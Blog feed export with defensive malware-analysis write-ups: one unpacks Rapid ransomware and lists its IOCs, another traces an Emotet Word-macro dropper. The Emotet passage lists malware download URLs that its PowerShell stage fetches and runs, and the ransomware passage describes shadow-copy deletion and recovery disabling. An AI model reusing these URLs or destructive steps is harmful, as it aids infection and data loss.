tag:blogger.com,1999:blog-7618614053762921162024-03-14T04:33:05.614+01:00Mr. JonesJust a collection of ctf or work related write-ups. If you want you can contact me on twitter
https://twitter.com/Mr__J____Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.comBlogger7125tag:blogger.com,1999:blog-761861405376292116.post-13059398294533890222018-01-25T18:33:00.003+01:002018-01-25T19:13:39.167+01:00Quick Overview of new Ransomware RapidYesterday I received a call about a system being infected with some kind of ransomware. I got told that files were encrypted with the file extension .rapid. A quick google search revealed a post about this kind of ransomware from 2 days ago <a href="https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/">https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/</a><br />
<br />
As the caller was unable to provide me with a sample at this time, I googled (rapid ransomware twitter) for rapid ransomware samples and found this tweet <a href="https://twitter.com/demonslay335/status/948210920228032512">https://twitter.com/demonslay335/status/948210920228032512</a> which contained Virustotal URLs to samples. And also a link to some russian blogpost <a href="https://id-ransomware.blogspot.com/2018/01/rapid-ransomware.html">https://id-ransomware.blogspot.com/2018/01/rapid-ransomware.html</a> .<br />
<br />
A few minutes later I got a second call and told the customer to check the %APPDATA% folder for a file called "info.exe", with success. They provided me with this sample (<a href="https://www.virustotal.com/#/file/a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05/detection">https://www.virustotal.com/#/file/a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05/detection</a>) which I decided to take a look at. As time was of the essence I only had about an hour to check the capabilities of the ransomware and wanted to share my approach.<br />
<br />
<h2>
Step 1 - Running the sample</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCKp3gjPOXzUFqb1k14gX2F0L2upljrA-c3xZW-2y7K4_jNnhpsP3J8UJ1A5PNl6FzIOxOBii3gydKH7SlwFoVXON1jjNGiUJA3R2DSxTX-5zvaAHaTgrTVvSEA7xkoJwqOeBgdF2yr92/s1600/procmon.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="462" data-original-width="1388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCKp3gjPOXzUFqb1k14gX2F0L2upljrA-c3xZW-2y7K4_jNnhpsP3J8UJ1A5PNl6FzIOxOBii3gydKH7SlwFoVXON1jjNGiUJA3R2DSxTX-5zvaAHaTgrTVvSEA7xkoJwqOeBgdF2yr92/s1600/procmon.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
As usual I checked hybrid-analysis for the given sample which provided me with some basic information about the sample, especially about deleting shadow copies and terminating common database processes. I ran the sample and monitored with process monitor and process explorer from Sysinternals. I noticed some basic persistence and the capability to encrypt network drives, nothing unusual.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyGztUrqH9DolHJFRD_nAUMPadk-0AAVkPXN4dkm8fKe4SVcSBgfT1wtZ7tdQbnuiCdL2upNc8uweGNYY7IyUBPzggnfkGpDY4d-5iaryUe6deLX75DWKUSZnQyIbpxnSaBmXSTAmd0Gbi/s1600/procmon2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="653" data-original-width="705" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyGztUrqH9DolHJFRD_nAUMPadk-0AAVkPXN4dkm8fKe4SVcSBgfT1wtZ7tdQbnuiCdL2upNc8uweGNYY7IyUBPzggnfkGpDY4d-5iaryUe6deLX75DWKUSZnQyIbpxnSaBmXSTAmd0Gbi/s1600/procmon2.JPG" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br />
<br /></div>
<div>
<br /></div>
<h2>
Step 2 - Basic overview in IDA</h2>
<div>
I opened the executable in IDA and got presented with an unusual looking WinMain function.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTaNdV1w5ElAfpLUfSvEwdtlvH1bFXCYHo1FAeFh8nMdGPpPTiaiU1sbbsCB9f3EwMhc8kGcfKI1hHMmdjuzakL3VKu9Tp1ZICBRgfHe6cnSSYJS5Kr85ScZ5wNryzUBSS_12NeE1Yygv/s1600/winmain.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1015" data-original-width="312" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTaNdV1w5ElAfpLUfSvEwdtlvH1bFXCYHo1FAeFh8nMdGPpPTiaiU1sbbsCB9f3EwMhc8kGcfKI1hHMmdjuzakL3VKu9Tp1ZICBRgfHe6cnSSYJS5Kr85ScZ5wNryzUBSS_12NeE1Yygv/s320/winmain.JPG" width="98" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Several subfunctions also were huge and looked like obfuscation code.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDJi0czyvzFXGFz7TWx4KQovdeI1rAioQ1PAu4QBTDugqRfY5rvzJImJFY5GA53RXVKjdh08FngVqxlsQjlxiE8o0axeEHUwEOYjRWFSZALkHkgcrckJ8Ck9ZEhlhU_88BYBtUG8L-4Oms/s1600/weirdo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="1600" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDJi0czyvzFXGFz7TWx4KQovdeI1rAioQ1PAu4QBTDugqRfY5rvzJImJFY5GA53RXVKjdh08FngVqxlsQjlxiE8o0axeEHUwEOYjRWFSZALkHkgcrckJ8Ck9ZEhlhU_88BYBtUG8L-4Oms/s320/weirdo.JPG" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
I didn't have the time to deal with the obfuscation so I decided to run the sample in x64dbg. I noticed a call to LoadLibrary near the end of the WinMain-function and decided to put a breakpoint on it to see if any suspicious API-functions are loaded at run time. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoilP7NXGIIwbQ6AXHHqqxWkZJ4zrFv5l9kgmupS_KDLCvHWf0cjqeWzCyUJCE2b-HZb9SFH9tl8JFWTY-EAfKy9dhDdy4XhZfUXldq3p8fn3-0hYLbunArM7eQr7z9g3GysjbuE57exUL/s1600/shellexecuteA.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="777" data-original-width="1436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoilP7NXGIIwbQ6AXHHqqxWkZJ4zrFv5l9kgmupS_KDLCvHWf0cjqeWzCyUJCE2b-HZb9SFH9tl8JFWTY-EAfKy9dhDdy4XhZfUXldq3p8fn3-0hYLbunArM7eQr7z9g3GysjbuE57exUL/s1600/shellexecuteA.JPG" /></a></div>
<div>
The breakpoint was hit 7-times and I noticed shell32.CryptDecrypt and shell32.ShellExecuteA on the stack. As it turned out this step wasn't necessary and one can simply put a hardware breakpoint on shell32.ShellExecuteA. (the malware seems to remove software breakpoints during execution)<br />
<br />
I thought about the hybrid-analysis results containing "cmd.exe ..." to kill known database processes. As ransomware usually persists itself before starting to encrypt files. I had two options, either break on the resulting registry functions or trying to break on shell32.ShellExecuteA.</div>
<div>
<br />
I put a breakpoint and continued to run the sample. On hit I followed the return value on the stack and found multiple plaintext strings. So I decided to dump the process and load it in IDA.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z7O_RtSuLkl_tS65a8FFGmRMCZybCZlNUyn2vuTVXRF4dJZsWhkOF3GSTuA1NsTCI4z2Qk_eavOBZScSMZ-id37nEXGZ2U1Aaa4MP9S7z-QlntuaFHkCj3V9qltHj7s8jDjomFFkebaI/s1600/shellexec2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="601" data-original-width="1432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z7O_RtSuLkl_tS65a8FFGmRMCZybCZlNUyn2vuTVXRF4dJZsWhkOF3GSTuA1NsTCI4z2Qk_eavOBZScSMZ-id37nEXGZ2U1Aaa4MP9S7z-QlntuaFHkCj3V9qltHj7s8jDjomFFkebaI/s1600/shellexec2.JPG" /></a></div>
<div>
<br />
<br />
<h2>
Step 3 - Unpacked binary in IDA</h2>
</div>
<div>
Opening the sort of unpacked binary I immediately checked the strings and found a couple of interesting ones. Which also indicate that the malware persists itself to Software\\Microsoft\\Windows\\CurrentVersion\\Run and kills oracle.exe, sqlite.exe and sql.exe. One can also see the hardcoded info.exe name, which will be the name of the persisted file as we will see later on.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ohjTwDMH2Go5CMNMCYxyCZjPa_dR2OO1QEIM1V6QqzhMBGbzQoR2GZBewaGJcdtVxvhuEiANgEP56s5ZcEaCiApRtP9OA0oH2rILPDepGQW0quXscwc7YVW0TOYcVC5dcF2f3TxcBiSb/s1600/ida_strings.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="843" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ohjTwDMH2Go5CMNMCYxyCZjPa_dR2OO1QEIM1V6QqzhMBGbzQoR2GZBewaGJcdtVxvhuEiANgEP56s5ZcEaCiApRtP9OA0oH2rILPDepGQW0quXscwc7YVW0TOYcVC5dcF2f3TxcBiSb/s1600/ida_strings.JPG" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
I followed the ShellExecuteA return value from my debugging session and found the main ransomware function which is quite small and similar to other ransomware like crysis.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiJM6iaPVcsMvff1k8bFyz-SBdS7tsJu0Ai9g2y7b8U2dxsszPF9gZNL48p8LeTbXh47ty2ZrDwaNRfIf_AzLu-HeZnt9sllrkSscx04iqwTNlfKeuIt0fwJwLCMlJ4s2tCOTp84EiL1L/s1600/rapid_main_function.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="1119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiJM6iaPVcsMvff1k8bFyz-SBdS7tsJu0Ai9g2y7b8U2dxsszPF9gZNL48p8LeTbXh47ty2ZrDwaNRfIf_AzLu-HeZnt9sllrkSscx04iqwTNlfKeuIt0fwJwLCMlJ4s2tCOTp84EiL1L/s1600/rapid_main_function.JPG" /></a></div>
<div>
There are 6 calls to ShellExecute in total:</div>
<div>
<ol>
<li>Delete shadow copies (requires admin rights)</li>
<li>This command disables booting in safe mode if I remember correctly (requires admin rights)</li>
<li>Seems to be required to run 2. on enterprise version (requires admin rights) (<a href="https://social.technet.microsoft.com/Forums/windows/en-US/30e16d16-5398-474b-b4c0-9a727a686f9a/bcdedit-set-fails-on-setting-recoveryenabled-to-no-for-default-guid?forum=w7itproinstall">https://social.technet.microsoft.com/Forums/windows/en-US/30e16d16-5398-474b-b4c0-9a727a686f9a/bcdedit-set-fails-on-setting-recoveryenabled-to-no-for-default-guid?forum=w7itproinstall</a>)</li>
<li>Kill oracle</li>
<li>Kill sqlite</li>
<li>Kill sql</li>
</ol>
<div>
Afterwards %APPDATA% is resolved and the file itself is copied to %APPDATA% as info.exe and persisted. The malware also creates a file called recovery.txt which will also be run on reboot.</div>
</div>
<div>
<br /></div>
<div>
The function init_crypto writes new generated keys to HKEY_CURRENT_USER\Software\EncryptKets</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr7EvGOZ0D5I48027XwdUJrS71s-KR2s-e0G8-euCMvIhF4xPElrVIKpc-OElmVjorDVAr5XJDvg5txzYl3_tq57m5ziOcgQZgjcYspY6NBepLvtJ36_S2xmqb0pC1wFxINSVs63jAHMJC/s1600/reg_keys.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="105" data-original-width="717" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr7EvGOZ0D5I48027XwdUJrS71s-KR2s-e0G8-euCMvIhF4xPElrVIKpc-OElmVjorDVAr5XJDvg5txzYl3_tq57m5ziOcgQZgjcYspY6NBepLvtJ36_S2xmqb0pC1wFxINSVs63jAHMJC/s1600/reg_keys.JPG" /></a></div>
<div>
The local_public_key is hardcoded in it's base64encoded form into the binary (BgIAAACkAABSU0ExAAgAAAEAAQB5HZZSge6GEPqkQTwzzugIrH3nOJHkLUsbUfm3m2bbJrLyNSM2FOQKxEMix1agNja0IgBmzzueh6nsn4ALDCD/fCwQAotsEDfnYpQDz9dKoHmMPMGCuXESkdMEiVm83PyAnJh4f4Zcq6Y1ONNmuMTfS6kTP0JUlqhM3VHWiafi+eaTL01x2kOeSupagrho+IqG6FH8Bl0weQXYpFjbxgpV3ldkKB4lf66rHFFfk93vOQhLvl2rDCg/fAMGFBIF5debBtCSi+t19biR+ze5Zau9/wd6+3Ec8DXRdpTjK7n8Q3hQouTONlY9RgjpHxLoPxsrWnyxPc6F/AUxKXkWeLW/) (also noted here: <a href="https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/">https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/</a>)<br />
<br />
The following screenshot shows the init_crypto function.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohPkqVd2jLkpAkZ56lkkgrjIPvOJ_65Goktqm19o0AnoGkvfK0eH0x_YvCTh5Qg2126_so4NMwSP7dkpclG-0vseGS0spHQXpWz_27U1m0rEFHVcnWBuzAELbjXqTE4iW1VPtE8a-vvuh/s1600/initcrypto.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="529" data-original-width="1026" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohPkqVd2jLkpAkZ56lkkgrjIPvOJ_65Goktqm19o0AnoGkvfK0eH0x_YvCTh5Qg2126_so4NMwSP7dkpclG-0vseGS0spHQXpWz_27U1m0rEFHVcnWBuzAELbjXqTE4iW1VPtE8a-vvuh/s1600/initcrypto.JPG" /></a></div>
<div>
<br /></div>
<div>
After initializing the crypto function the ransomware iterates all logical drives (the drives you see in your windows explorer) and determines whether a drive is a network drive or not. Running the sample it seems to prioritize network drives for encryption.<br />
<br />
The final calls after the for loop start the multit-hreaded file encryption, display the ransom note (which actually doesn't work, you only see a cmd windows pop up) and sleep 30 seconds until the encryption process is restarted in an infinite loop. Which means if you create new files while the ransomware is active they will be encrypted ~ after 30 seconds. If you want to see the ransomware note just reboot the machine.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHm8P7RCk86ZKyJVCRpmBSc_qxmteFE0PLOe9Vpwj1z_50PUdGOrmJQBYNzOVdgDGSpEyBqIG15L4oVGA9m7a0NFGLJhG2snnw4GK1MrLCuaOkSQX1jmsL-sHDc4KaO2N-st08YZsQnsG7/s1600/ransomnote.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHm8P7RCk86ZKyJVCRpmBSc_qxmteFE0PLOe9Vpwj1z_50PUdGOrmJQBYNzOVdgDGSpEyBqIG15L4oVGA9m7a0NFGLJhG2snnw4GK1MrLCuaOkSQX1jmsL-sHDc4KaO2N-st08YZsQnsG7/s1600/ransomnote.JPG" /></a></div>
<div>
<br /></div>
<h2>
Detection using Sysinternals-Autoruns</h2>
<div>
To check if a server/machine is infected by rapid ransomware just run autorunsc.exe from sysinternals in a powershell with admin rights by issuing the following command</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
.\autorunsc.exe -a * * | grep info.exe (remember to accept the eula first)</blockquote>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMvGhiTDeHxmcIh9n0xyMHRE41qxqQXTAWxRcDJqwcvVos-drXuWo5manZSTkUr_3aw6CrgH9hMqvirWOp__UHV22mwsmxW2YF0L15PMYeN5Ug2cCd0-kbDHNSZzxT7s0V4qybY98Ce4cC/s1600/autoruns.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="51" data-original-width="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMvGhiTDeHxmcIh9n0xyMHRE41qxqQXTAWxRcDJqwcvVos-drXuWo5manZSTkUr_3aw6CrgH9hMqvirWOp__UHV22mwsmxW2YF0L15PMYeN5Ug2cCd0-kbDHNSZzxT7s0V4qybY98Ce4cC/s1600/autoruns.JPG" /></a></div>
<h2>
</h2>
<div>
<h2>
<span style="color: red; font-size: x-large;">Conclusion</span></h2>
<div>
The infection in this particular case happened via stolen/weak RDP credentials, the crooks just logged onto the system and started the ransomware with admin rights.</div>
<span style="color: red; font-size: x-large;">That's it for today.</span></div>
<h2>
IOCs</h2>
<h3>
Registry</h3>
<div>
Software\EncryptKets</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ5i3ZFY7wspAwuO9xDj0du5yvW5zTQnoDYrHQidxlM3Fy3-aWdbBDaud1KVgwq9L4rnt42T7IZsfJjvjdZN6HqwA49z0rraiVmqIr3axjYMAPlafo38JF9g7CgQSuqAD1repx28uf5JtS/s1600/reg_keys.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="105" data-original-width="717" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ5i3ZFY7wspAwuO9xDj0du5yvW5zTQnoDYrHQidxlM3Fy3-aWdbBDaud1KVgwq9L4rnt42T7IZsfJjvjdZN6HqwA49z0rraiVmqIr3axjYMAPlafo38JF9g7CgQSuqAD1repx28uf5JtS/s1600/reg_keys.JPG" /></a></div>
<div>
<br /></div>
<div>
Software\\Microsoft\\Windows\\CurrentVersion\\Run</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc4f4Hcd-955wo239oV1ASMqH8RdpHaI7mqja8t5WjIufXba8xYhkK3Hmg2svKcVR5oXWggkW3NDFbtWolwwt_-OdiK0FvHYPMZ6nMUGeaOOMu7M9EYEx1wz3yrw51yQY1xTI8HbReB4s1/s1600/autostart.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="87" data-original-width="558" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc4f4Hcd-955wo239oV1ASMqH8RdpHaI7mqja8t5WjIufXba8xYhkK3Hmg2svKcVR5oXWggkW3NDFbtWolwwt_-OdiK0FvHYPMZ6nMUGeaOOMu7M9EYEx1wz3yrw51yQY1xTI8HbReB4s1/s1600/autostart.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3 style="clear: both; text-align: left;">
Files</h3>
<br />
<pre>%AppData%\info.exe
%AppData%\recovery.txt</pre>
<pre></pre>
<h3>
Ransom Note</h3>
<h3 style="clear: both; text-align: left;">
</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEKRvfgG93hitVlGjm4wMvgbp6KQ3bT54a3WS-FwWS2P3IZyjfP-lcEKeEFqMSP6aPiKODPwUObu61ElGoAiwaPxZqogCdtFWVgdQWYeT-DRncyZCqBCi6ggLGNjsnaAAWgy9xmw3RMsIG/s1600/ransomnote.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEKRvfgG93hitVlGjm4wMvgbp6KQ3bT54a3WS-FwWS2P3IZyjfP-lcEKeEFqMSP6aPiKODPwUObu61ElGoAiwaPxZqogCdtFWVgdQWYeT-DRncyZCqBCi6ggLGNjsnaAAWgy9xmw3RMsIG/s1600/ransomnote.JPG" /></a></div>
<h3 style="clear: both; text-align: left;">
Public RSA Key (base64 encoded)</h3>
<div style="text-align: left;">
BgIAAACkAABSU0ExAAgAAAEAAQB5HZZSge6GEPqkQTwzzugIrH3nOJHkLUsbUfm3m2bbJrLyNSM2FOQKxEMix1agNja0IgBmzzueh6nsn4ALDCD/fCwQAotsEDfnYpQDz9dKoHmMPMGCuXESkdMEiVm83PyAnJh4f4Zcq6Y1ONNmuMTfS6kTP0JUlqhM3VHWiafi+eaTL01x2kOeSupagrho+IqG6FH8Bl0weQXYpFjbxgpV3ldkKB4lf66rHFFfk93vOQhLvl2rDCg/fAMGFBIF5debBtCSi+t19biR+ze5Zau9/wd6+3Ec8DXRdpTjK7n8Q3hQouTONlY9RgjpHxLoPxsrWnyxPc6F/AUxKXkWeLW/</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
File Hashes</h3>
<br />
<div>
MD5:<span style="white-space: pre;"> </span>a5c1a9659108b23aa6564a4e4e2d8e83</div>
<div>
<div>
SHA-1:<span style="white-space: pre;"> </span>39a87293f440221581f18708befe1860cdd3822c</div>
<div>
SHA-256:a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEKRvfgG93hitVlGjm4wMvgbp6KQ3bT54a3WS-FwWS2P3IZyjfP-lcEKeEFqMSP6aPiKODPwUObu61ElGoAiwaPxZqogCdtFWVgdQWYeT-DRncyZCqBCi6ggLGNjsnaAAWgy9xmw3RMsIG/s1600/ransomnote.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com2tag:blogger.com,1999:blog-761861405376292116.post-67438125499360222002017-08-30T23:01:00.000+02:002017-08-30T23:05:18.266+02:00New Emotet Spam Wave 24.8.2017<h2>
Background story </h2>
<br />
On Thursday multiple customers contacted me about emails from business partners or colleagues that contained scans or invoices. The emails itself weren't really well done but most customers were afraid of having been breached because it looked like someone from within the company send them the mails. I started with a quick google search and could calm them down immediately because I found several similar looking emails.<br />
<br />
You can find example emails here <a href="https://vorsicht-email.de/beitrag/2017/08/24/scan-27511149471vorname-nachname-von-ufabaeckereiufafabrik-de-medicicasadicurafratesole-it-oder-rechnung-mjb-921-kd0727-vorname-nachname-von-infoaws-praezisionstechnik-de-nikolovmatstar-b/">example mails (german)</a><br />
<h2>
</h2>
<h2>
Stage 1 - Macro Word Downloader</h2>
<div class="separator" style="clear: both; text-align: center;">
</div>
I noticed that each email contained an URL behind each was a download to a word document. Opening the document leads to the following image which contains a description on how to enable the content and macros.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCTtFNiRlZvN8tj4xKHOo3XkepKeDlhgeUHavTiAnzR24Jen6CyUPCSvwrz8AknDudPln9TJc8wF0WdH6f5HNe7jKTdkFAVnUfzqPESU8AZjbDFW09VMS6J9hY9tLfu-safmqas0k3QmKs/s1600/word.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="409" data-original-width="812" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCTtFNiRlZvN8tj4xKHOo3XkepKeDlhgeUHavTiAnzR24Jen6CyUPCSvwrz8AknDudPln9TJc8wF0WdH6f5HNe7jKTdkFAVnUfzqPESU8AZjbDFW09VMS6J9hY9tLfu-safmqas0k3QmKs/s640/word.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">word macro dropper</td></tr>
</tbody></table>
<br />
<br />
One of the first steps after just enabling macros and monitoring the network traffic, is to open the build in VBA Editor and try to debug the embedded macros. I noticed that the macros aren't password protected and that the document contains an autoopen function. The autoopen function calls another function which does all the important work. (I noticed this by just quickly stepping through it and monitoring network connections)<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
I added a few Debug.Print statements and could quickly figure out that the macro creates a wscript.shell object to execute a base64 encoded powershell command. The next figure contains the main macro function with a few deobfuscated strings.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUJnWOyZAJ4eR4nrpvLzwslHgud5z74Z0EFGgMF8drzRevSNYZAZ4il8zXXjgSk7BDvxWR6JweFpDlzxL8ya4FWe1-XIdKZmGBSNjUuCWLAHR1AKfioIkoAyAGrFLW8KxLKWy9GzFkd1GJ/s1600/cleaned_macro.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="341" data-original-width="1383" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUJnWOyZAJ4eR4nrpvLzwslHgud5z74Z0EFGgMF8drzRevSNYZAZ4il8zXXjgSk7BDvxWR6JweFpDlzxL8ya4FWe1-XIdKZmGBSNjUuCWLAHR1AKfioIkoAyAGrFLW8KxLKWy9GzFkd1GJ/s1600/cleaned_macro.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partly deobfuscated macro</td></tr>
</tbody></table>
<br />
<br />
The next step is to analyze the powershell and try to extract some IOCs.<br />
<br />
<h2>
Stage 2 - Base64 encoded powershell</h2>
The next step is to base64decode the powershell command to see what it does<br />
<br />
<br />
<i>[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("JAB7AH..."))</i><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPmkissMzn3xaXRQ3e06hpSAroTthHGfYpZtkX1XCf102hhpm2g2I7qo35l-37sug0ICQ_rc_bg0HysBlDbCSq4mGTpZ7nozFYhP6sWqEpXycFIhOpxzm6muGyQzJULO24L1KhAzxojmCT/s1600/uncleandedbase64decpowershell.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="176" data-original-width="990" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPmkissMzn3xaXRQ3e06hpSAroTthHGfYpZtkX1XCf102hhpm2g2I7qo35l-37sug0ICQ_rc_bg0HysBlDbCSq4mGTpZ7nozFYhP6sWqEpXycFIhOpxzm6muGyQzJULO24L1KhAzxojmCT/s1600/uncleandedbase64decpowershell.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">base64 decoded powershell</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I reformat the powershell a bit and dumb variables using Write-Host. (info: Declaring a variable like ${PA`TH} the ` gets ignored and one can just use Write-Host ${PATH} to get the content)<br />
Which shows an array of 5 URLs where the script tries to download from.<br />
The downloads are saved in %TEMP% with a random name in range(65536) + .exe. Afterwards the script tries to run the downloaded file.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7AQ_CMcy0OucQ6KIgmH44q5nbtCj3jxN84a__oRxbFHatDRDExLTZHfRUV2or7OS9xXDPPEfkNvg3LbSkUfBEol4OEM7T1oS4rNvjcZ2VkH8gQ7fMdEncbKx-5LxXkYxdVCdca9JeQFYL/s1600/cleandedbase64decpowershell.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="224" data-original-width="1175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7AQ_CMcy0OucQ6KIgmH44q5nbtCj3jxN84a__oRxbFHatDRDExLTZHfRUV2or7OS9xXDPPEfkNvg3LbSkUfBEol4OEM7T1oS4rNvjcZ2VkH8gQ7fMdEncbKx-5LxXkYxdVCdca9JeQFYL/s1600/cleandedbase64decpowershell.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">beautified powershell</td></tr>
</tbody></table>
<br />
On successful download we get an executable. The script contains 5 URLs some of them are still working:<br />
<br />
<i>http://e-thesis.com/hpV/<br />http://jonjun.com/vVKbiCUJ/<br />http://cvif.org/CsGXp/<br />http://daze.com.hk/yaeRXq/<br />http://funkystudio.org/lEYJk/</i><br />
<br />
<br />
<h2>
